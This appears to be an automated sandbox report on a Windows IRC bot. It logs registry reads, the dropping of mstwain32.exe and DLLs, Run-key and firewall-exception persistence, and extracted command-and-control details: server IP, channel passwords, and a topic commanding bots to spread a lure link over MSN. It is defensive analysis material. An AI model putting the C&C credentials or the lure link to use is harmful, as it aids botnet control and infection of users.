HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType


File Changes by all processes
New Files c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
C:\WINDOWS\mstwain32.exe
\\.\PIPE\wkssvc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
Deleted Files
Chronological Order Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)

deli.byinter.net (turkish lamers)

deli.byinter.net 93.190.138.202

* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :

* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg þu resme bi bakarmýsýn (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=


* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF





Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 "win32"
HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
